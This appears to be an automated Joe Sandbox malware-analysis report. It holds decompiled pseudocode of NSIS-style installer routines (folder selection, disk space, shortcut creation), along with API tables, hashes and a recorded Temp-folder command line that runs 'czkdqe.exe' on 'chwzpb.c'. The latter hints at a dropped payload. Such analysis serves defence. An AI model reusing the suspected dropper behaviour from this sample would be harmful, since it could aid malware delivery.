                                                                                    							_v12 = _v12 & 0x00000000;
                                                                                    							E00405CAC(0x3fb, _t146);
                                                                                    							if(E0040603F(_t186, _t146) == 0) {
                                                                                    								_v8 = 1;
                                                                                    							}
                                                                                    							E00406668(0x421718, _t146);
                                                                                    							_t87 = E00406A35(1);
                                                                                    							_v16 = _t87;
                                                                                    							if(_t87 == 0) {
                                                                                    								L30:
                                                                                    								E00406668(0x421718, _t146);
                                                                                    								_t89 = E00405FE2(0x421718);
                                                                                    								_t158 = 0;
                                                                                    								if(_t89 != 0) {
                                                                                    									 *_t89 = 0;
                                                                                    								}
                                                                                    								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                    									goto L35;
                                                                                    								} else {
                                                                                    									_t169 = 0x400;
                                                                                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                    									asm("cdq");
                                                                                    									_v48 = _t109;
                                                                                    									_v44 = _t156;
                                                                                    									_v12 = 1;
                                                                                    									goto L36;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t159 = 0;
                                                                                    								if(0 == 0x421718) {
                                                                                    									goto L30;
                                                                                    								} else {
                                                                                    									goto L26;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									L26:
                                                                                    									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                                                    									if(_t114 != 0) {
                                                                                    										break;
                                                                                    									}
                                                                                    									if(_t159 != 0) {
                                                                                    										 *_t159 =  *_t159 & _t114;
                                                                                    									}
                                                                                    									_t160 = E00405F83(0x421718);
                                                                                    									 *_t160 =  *_t160 & 0x00000000;
                                                                                    									_t159 = _t160;
                                                                                    									 *_t159 = 0x5c;
                                                                                    									if(_t159 != 0x421718) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L30;
                                                                                    									}
                                                                                    								}
                                                                                    								_t150 = _v44;
                                                                                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                    								_v44 = _t150 >> 0xa;
                                                                                    								_v12 = 1;
                                                                                    								_t158 = 0;
                                                                                    								__eflags = 0;
                                                                                    								L35:
                                                                                    								_t169 = 0x400;
                                                                                    								L36:
                                                                                    								_t95 = E00404F52(5);
                                                                                    								if(_v12 != _t158) {
                                                                                    									_t197 = _v44;
                                                                                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                    										_v8 = 2;
                                                                                    									}
                                                                                    								}
                                                                                    								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                                                    									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                                                    									if(_v12 == _t158) {
                                                                                    										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                                                    									} else {
                                                                                    										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                                                    									}
                                                                                    								}
                                                                                    								_t96 = _v8;
                                                                                    								 *0x42a304 = _t96;
                                                                                    								if(_t96 == _t158) {
                                                                                    									_v8 = E0040140B(7);
                                                                                    								}
                                                                                    								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                    									_v8 = _t158;
                                                                                    								}
                                                                                    								E004045E6(0 | _v8 == _t158);
                                                                                    								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                                                    									E00404A0E();
                                                                                    								}
                                                                                    								 *0x423738 = _t158;
                                                                                    								goto L53;
                                                                                    							}
                                                                                    						}
                                                                                    						_t186 = _a8 - 0x405;
                                                                                    						if(_a8 != 0x405) {
                                                                                    							goto L53;
                                                                                    						}
                                                                                    						goto L22;
                                                                                    					}
                                                                                    					_t118 = _a12 & 0x0000ffff;
                                                                                    					if(_t118 != 0x3fb) {
                                                                                    						L12:
                                                                                    						if(_t118 == 0x3e9) {
                                                                                    							_t152 = 7;
                                                                                    							memset( &_v76, 0, _t152 << 2);
                                                                                    							_v80 = _t167;
                                                                                    							_v72 = 0x423748;
                                                                                    							_v60 = E00404E0B;
                                                                                    							_v56 = _t146;
                                                                                    							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                                    							_t122 =  &_v80;
                                                                                    							_v64 = 0x41;
                                                                                    							__imp__SHBrowseForFolderW(_t122);
                                                                                    							if(_t122 == 0) {
                                                                                    								_a8 = 0x40f;
                                                                                    							} else {
                                                                                    								__imp__CoTaskMemFree(_t122);
                                                                                    								E00405F37(_t146);
                                                                                    								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                                                    								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                                                    									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                                                    									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                                    										lstrcatW(_t146, 0x428200);
                                                                                    									}
                                                                                    								}
                                                                                    								 *0x423738 =  *0x423738 + 1;
                                                                                    								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L20;
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0x300) {
                                                                                    						goto L53;
                                                                                    					}
                                                                                    					_a8 = 0x40f;
                                                                                    					goto L12;
                                                                                    				} else {
                                                                                    					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                    					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                                                    						E00405F37(_t146);
                                                                                    					}
                                                                                    					 *0x429238 = _t167;
                                                                                    					SetWindowTextW(_t166, _t146);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                    					_push(1);
                                                                                    					E004045C4(_t167);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                    					_push(0x14);
                                                                                    					E004045C4(_t167);
                                                                                    					E004045F9(_t166);
                                                                                    					_t138 = E00406A35(8);
                                                                                    					if(_t138 == 0) {
                                                                                    						L53:
                                                                                    						return E0040462B(_a8, _a12, _a16);
                                                                                    					} else {
                                                                                    						 *_t138(_t166, 1);
                                                                                    						goto L8;
                                                                                    					}
                                                                                    				}
                                                                                    			}













































                                                                                    0x00404ab5
                                                                                    0x00404abb
                                                                                    0x00404ac1
                                                                                    0x00404ace
                                                                                    0x00404adc
                                                                                    0x00404adf
                                                                                    0x00404ae7
                                                                                    0x00404aed
                                                                                    0x00404aed
                                                                                    0x00404af9
                                                                                    0x00404afc
                                                                                    0x00404b6a
                                                                                    0x00404b71
                                                                                    0x00404c48
                                                                                    0x00404c4f
                                                                                    0x00404c5e
                                                                                    0x00404c5e
                                                                                    0x00404c62
                                                                                    0x00404c6c
                                                                                    0x00404c79
                                                                                    0x00404c7b
                                                                                    0x00404c7b
                                                                                    0x00404c89
                                                                                    0x00404c90
                                                                                    0x00404c97
                                                                                    0x00404c9a
                                                                                    0x00404cd6
                                                                                    0x00404cd8
                                                                                    0x00404cde
                                                                                    0x00404ce3
                                                                                    0x00404ce7
                                                                                    0x00404ce9
                                                                                    0x00404ce9
                                                                                    0x00404d05
                                                                                    0x00000000
                                                                                    0x00404d07
                                                                                    0x00404d0a
                                                                                    0x00404d18
                                                                                    0x00404d1e
                                                                                    0x00404d1f
                                                                                    0x00404d22
                                                                                    0x00404d25
                                                                                    0x00000000
                                                                                    0x00404d25
                                                                                    0x00404c9c
                                                                                    0x00404c9e
                                                                                    0x00404ca2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404ca4
                                                                                    0x00404ca4
                                                                                    0x00404cb1
                                                                                    0x00404cb6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404cba
                                                                                    0x00404cbc
                                                                                    0x00404cbc
                                                                                    0x00404cc5
                                                                                    0x00404cc7
                                                                                    0x00404ccc
                                                                                    0x00404ccf
                                                                                    0x00404cd4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404cd4
                                                                                    0x00404d31
                                                                                    0x00404d3b
                                                                                    0x00404d3e
                                                                                    0x00404d41
                                                                                    0x00404d48
                                                                                    0x00404d48
                                                                                    0x00404d4a
                                                                                    0x00404d4a
                                                                                    0x00404d4f
                                                                                    0x00404d51
                                                                                    0x00404d59
                                                                                    0x00404d60
                                                                                    0x00404d62
                                                                                    0x00404d6d
                                                                                    0x00404d6d
                                                                                    0x00404d62
                                                                                    0x00404d7d
                                                                                    0x00404d87
                                                                                    0x00404d8f
                                                                                    0x00404daa
                                                                                    0x00404d91
                                                                                    0x00404d9a
                                                                                    0x00404d9a
                                                                                    0x00404d8f
                                                                                    0x00404daf
                                                                                    0x00404db4
                                                                                    0x00404db9
                                                                                    0x00404dc2
                                                                                    0x00404dc2
                                                                                    0x00404dcb
                                                                                    0x00404dcd
                                                                                    0x00404dcd
                                                                                    0x00404dd9
                                                                                    0x00404de1
                                                                                    0x00404deb
                                                                                    0x00404deb
                                                                                    0x00404df0
                                                                                    0x00000000
                                                                                    0x00404df0
                                                                                    0x00404c9a
                                                                                    0x00404c51
                                                                                    0x00404c58
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404c58
                                                                                    0x00404b77
                                                                                    0x00404b80
                                                                                    0x00404b9a
                                                                                    0x00404b9f
                                                                                    0x00404ba9
                                                                                    0x00404bb0
                                                                                    0x00404bbc
                                                                                    0x00404bbf
                                                                                    0x00404bc2
                                                                                    0x00404bc9
                                                                                    0x00404bd1
                                                                                    0x00404bd4
                                                                                    0x00404bd8
                                                                                    0x00404bdf
                                                                                    0x00404be7
                                                                                    0x00404c41
                                                                                    0x00404be9
                                                                                    0x00404bea
                                                                                    0x00404bf1
                                                                                    0x00404bfb
                                                                                    0x00404c03
                                                                                    0x00404c10
                                                                                    0x00404c24
                                                                                    0x00404c28
                                                                                    0x00404c28
                                                                                    0x00404c24
                                                                                    0x00404c2d
                                                                                    0x00404c3a
                                                                                    0x00404c3a
                                                                                    0x00404be7
                                                                                    0x00000000
                                                                                    0x00404b9f
                                                                                    0x00404b8d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404b93
                                                                                    0x00000000
                                                                                    0x00404afe
                                                                                    0x00404b0b
                                                                                    0x00404b14
                                                                                    0x00404b21
                                                                                    0x00404b21
                                                                                    0x00404b28
                                                                                    0x00404b2e
                                                                                    0x00404b37
                                                                                    0x00404b3a
                                                                                    0x00404b3d
                                                                                    0x00404b45
                                                                                    0x00404b48
                                                                                    0x00404b4b
                                                                                    0x00404b51
                                                                                    0x00404b58
                                                                                    0x00404b5f
                                                                                    0x00404df6
                                                                                    0x00404e08
                                                                                    0x00404b65
                                                                                    0x00404b68
                                                                                    0x00000000
                                                                                    0x00404b68
                                                                                    0x00404b5f

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00404B04
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                    • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00423748,00000000,?,?), ref: 00404C1C
                                                                                    • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c), ref: 00404C28
                                                                                    • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c$A$C:\Users\user\AppData\Local\Temp$H7B
                                                                                    • API String ID: 2624150263-1062716227
                                                                                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 67%
                                                                                    			E004021AA() {
                                                                                    				signed int _t52;
                                                                                    				void* _t56;
                                                                                    				intOrPtr* _t60;
                                                                                    				intOrPtr _t61;
                                                                                    				intOrPtr* _t62;
                                                                                    				intOrPtr* _t64;
                                                                                    				intOrPtr* _t66;
                                                                                    				intOrPtr* _t68;
                                                                                    				intOrPtr* _t70;
                                                                                    				intOrPtr* _t72;
                                                                                    				intOrPtr* _t74;
                                                                                    				intOrPtr* _t76;
                                                                                    				intOrPtr* _t78;
                                                                                    				intOrPtr* _t80;
                                                                                    				void* _t83;
                                                                                    				intOrPtr* _t91;
                                                                                    				signed int _t101;
                                                                                    				signed int _t105;
                                                                                    				void* _t107;
                                                                                    
                                                                                    				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                    				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                    				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                    				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                    				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                    				_t52 =  *(_t107 - 0x20);
                                                                                    				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                    				_t101 = _t52 & 0x00008000;
                                                                                    				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                    				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                    				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                    					E00402DA6(0x21);
                                                                                    				}
                                                                                    				_t56 = _t107 + 8;
                                                                                    				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                                                    				if(_t56 < _t83) {
                                                                                    					L14:
                                                                                    					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                    					_push(0xfffffff0);
                                                                                    				} else {
                                                                                    					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                    					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                                    					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                    					if(_t61 >= _t83) {
                                                                                    						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                    						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                    						if(_t101 == _t83) {
                                                                                    							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                    							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                                                                                    						}
                                                                                    						if(_t105 != _t83) {
                                                                                    							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                    							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                    						}
                                                                                    						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                    						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                    						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                    						if( *_t91 != _t83) {
                                                                                    							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                    							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                    						}
                                                                                    						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                    						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                    						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                    						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                    						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                    							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                    							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                    						}
                                                                                    						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                    						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                    					}
                                                                                    					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                    					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                    					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                    						_push(0xfffffff4);
                                                                                    					} else {
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				}
                                                                                    				E00401423();
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                                    				return 0;
                                                                                    			}






















                                                                                    0x004021b3
                                                                                    0x004021bd
                                                                                    0x004021c7
                                                                                    0x004021d1
                                                                                    0x004021dc
                                                                                    0x004021df
                                                                                    0x004021f9
                                                                                    0x004021fc
                                                                                    0x00402202
                                                                                    0x00402205
                                                                                    0x0040220f
                                                                                    0x00402213
                                                                                    0x00402213
                                                                                    0x00402218
                                                                                    0x00402229
                                                                                    0x00402231
                                                                                    0x004022e8
                                                                                    0x004022e8
                                                                                    0x004022ef
                                                                                    0x00402237
                                                                                    0x00402237
                                                                                    0x00402246
                                                                                    0x0040224a
                                                                                    0x0040224d
                                                                                    0x00402253
                                                                                    0x00402261
                                                                                    0x00402264
                                                                                    0x00402266
                                                                                    0x00402271
                                                                                    0x00402271
                                                                                    0x00402276
                                                                                    0x00402278
                                                                                    0x0040227f
                                                                                    0x0040227f
                                                                                    0x00402282
                                                                                    0x0040228b
                                                                                    0x0040228e
                                                                                    0x00402294
                                                                                    0x00402296
                                                                                    0x004022a0
                                                                                    0x004022a0
                                                                                    0x004022a3
                                                                                    0x004022ac
                                                                                    0x004022af
                                                                                    0x004022b8
                                                                                    0x004022be
                                                                                    0x004022c0
                                                                                    0x004022ce
                                                                                    0x004022ce
                                                                                    0x004022d1
                                                                                    0x004022d7
                                                                                    0x004022d7
                                                                                    0x004022da
                                                                                    0x004022e0
                                                                                    0x004022e6
                                                                                    0x004022fb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004022e6
                                                                                    0x004022f1
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID:
                                                                                    • API String ID: 542301482-0
                                                                                    • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                    • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 39%
                                                                                    			E0040290B(short __ebx, short* __edi) {
                                                                                    				void* _t21;
                                                                                    
                                                                                    				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                                    					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                    					_push(_t21 - 0x2b0);
                                                                                    					_push(__edi);
                                                                                    					E00406668();
                                                                                    				} else {
                                                                                    					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                    					 *__edi = __ebx;
                                                                                    					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                    				}
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                    				return 0;
                                                                                    			}




                                                                                    0x00402923
                                                                                    0x0040293e
                                                                                    0x00402949
                                                                                    0x0040294a
                                                                                    0x00402a94
                                                                                    0x00402925
                                                                                    0x00402928
                                                                                    0x0040292b
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                    • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                    				struct HWND__* _v8;
                                                                                    				struct HWND__* _v12;
                                                                                    				long _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				signed char* _v32;
                                                                                    				int _v36;
                                                                                    				signed int _v44;
                                                                                    				int _v48;
                                                                                    				signed int* _v60;
                                                                                    				signed char* _v64;
                                                                                    				signed int _v68;
                                                                                    				long _v72;
                                                                                    				void* _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				intOrPtr _v84;
                                                                                    				void* _v88;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t198;
                                                                                    				intOrPtr _t201;
                                                                                    				long _t207;
                                                                                    				signed int _t211;
                                                                                    				signed int _t222;
                                                                                    				void* _t225;
                                                                                    				void* _t226;
                                                                                    				int _t232;
                                                                                    				long _t237;
                                                                                    				long _t238;
                                                                                    				signed int _t239;
                                                                                    				signed int _t245;
                                                                                    				signed int _t247;
                                                                                    				signed char _t248;
                                                                                    				signed char _t254;
                                                                                    				void* _t258;
                                                                                    				void* _t260;
                                                                                    				signed char* _t278;
                                                                                    				signed char _t279;
                                                                                    				long _t284;
                                                                                    				struct HWND__* _t291;
                                                                                    				signed int* _t292;
                                                                                    				int _t293;
                                                                                    				long _t294;
                                                                                    				signed int _t295;
                                                                                    				void* _t297;
                                                                                    				long _t298;
                                                                                    				int _t299;
                                                                                    				signed int _t300;
                                                                                    				signed int _t303;
                                                                                    				signed int _t311;
                                                                                    				signed char* _t319;
                                                                                    				int _t324;
                                                                                    				void* _t326;
                                                                                    
                                                                                    				_t291 = _a4;
                                                                                    				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                    				_v8 = GetDlgItem(_t291, 0x408);
                                                                                    				_t326 = SendMessageW;
                                                                                    				_v24 =  *0x42a288;
                                                                                    				_v28 =  *0x42a270 + 0x94;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					L23:
                                                                                    					if(_a8 != 0x405) {
                                                                                    						_t301 = _a16;
                                                                                    					} else {
                                                                                    						_a12 = 0;
                                                                                    						_t301 = 1;
                                                                                    						_a8 = 0x40f;
                                                                                    						_a16 = 1;
                                                                                    					}
                                                                                    					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                    						_v16 = _t301;
                                                                                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                    							if(( *0x42a279 & 0x00000002) != 0) {
                                                                                    								L41:
                                                                                    								if(_v16 != 0) {
                                                                                    									_t237 = _v16;
